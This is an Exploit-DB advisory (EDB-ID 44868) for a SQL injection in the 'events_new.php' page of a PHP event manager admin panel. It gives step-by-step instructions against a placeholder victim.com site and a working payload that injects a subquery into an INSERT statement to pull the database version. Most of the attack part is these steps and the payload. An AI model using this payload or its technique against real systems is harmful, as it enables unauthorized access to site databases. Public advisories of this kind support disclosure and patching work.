Event Manager Admin panel - 'events_new.php' SQL injection

EDB-ID: 44868
Author: telahdihapus
Published: 2018-06-11
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 2018-06-10 
# Exploit Author: telahdihapus
# Vendor Homepage: https://codecanyon.net/user/ezcode
# Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741
# Tested on: windows 10

# 1. description :
# Insert data in events_new.php do not use escape string function,
# so attacker can put qoute character and inject query in insert data.

# 2. POC :
login in admin page http://victim.com/cms/, or you can register admin if you not have, register at http://victim.com/cms/register.

go to http://victim.com/cms/events_new.php

add new title, add some value and press "new type" button. you can see success notice.

now, add payload to value.

example payload = a'), (120, (select version()))-- -

120 is id, you can put your cursor in delete button, to see id, and you can prediction next id.

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